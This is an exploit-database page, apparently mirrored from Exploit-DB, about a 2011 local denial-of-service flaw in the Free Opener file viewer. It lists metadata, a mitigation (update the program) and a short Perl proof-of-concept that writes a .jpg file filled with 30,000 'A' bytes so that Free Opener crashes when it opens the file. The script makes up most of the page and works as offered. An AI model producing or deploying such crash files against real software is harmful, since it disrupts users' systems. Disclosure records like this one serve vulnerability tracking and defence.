header-logo
Suggest Exploit
vendor:
Free Opener
by:
Iolo Morganwg
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Free Opener
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2011

Free Opener Local Denial of Service

This exploit triggers a denial of service vulnerability in Free Opener by creating a file with a large amount of data. When the script is opened with Free Opener, the program crashes.

Mitigation:

Update to the latest version of Free Opener
Source

Exploit-DB raw data:

#!/usr/bin/perl

# Exploit Title:  Free Opener Local Denial of Service
# Date: 09-12-11
# Author: Iolo Morganwg
# Download: http://dl.installiq.com/download/downloadpop.aspx?shortname=freeopener&a=13193&f=FO-Main
# Tested on: Windows XP SP3

#To trigger: Run script open with Free opener, program dies!.

my $file= "crash25000.jpg";
my $junk = "\x41" x 30000;
# my $junk2 = "\x42" x 5000;

open($FILE,">$file");
print $FILE $junk.$junk2;
close($FILE);

print "File Created successfully\n";